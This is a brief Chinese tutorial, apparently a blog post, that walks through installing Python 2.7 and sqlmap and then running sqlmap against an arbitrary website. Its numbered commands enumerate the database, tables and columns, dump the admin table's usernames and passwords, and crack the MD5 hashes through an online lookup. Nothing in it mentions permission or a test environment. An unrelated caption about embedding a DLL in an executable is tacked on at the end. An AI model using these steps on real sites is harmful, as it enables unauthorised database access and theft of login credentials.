第一步:
安裝Python, 安裝完成将sqlmap檔案夾解壓放到C:\Python27\下面。
附件(Python2.7.1安裝包+sqlmap包):
https://download.csdn.net/download/qq_23306363/10724195
第二步:
1)win+R,輸入cmd,輸入 cd c:\ 進入c盤
2)确定網址:如"http://XXX"
3)輸入Python27\sqlmap\sqlmap.py -u"http://XXX" --forms
4)Python27\sqlmap\sqlmap.py -u “http://XXX” --forms --dbms mysql --current-db 找到目前的庫名稱,如:BaseA
5)Python27\sqlmap\sqlmap.py -u “http://XXX” --forms --dbms mysql -D BaseA --tables 找到所有的表,比如有: admin,student,classes
6)Python27\sqlmap\sqlmap.py -u"http://XXX"–forms --dbms mysql -D BaseA -T admin --columns 找到admin表的所有字段,如 name,pwd
7)Python27\sqlmap\sqlmap.py -u"http://XXX" --forms --dbms mysql -D BaseA -T admin -C name,pwd --dump 顯示出該表所有登入名及密碼
8)拷貝出pwd百度MD5線上解密,即可查出pwd.
![exe中怎麼嵌入dll?在資源中配置dll通過反射機制注冊資源中的dll[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)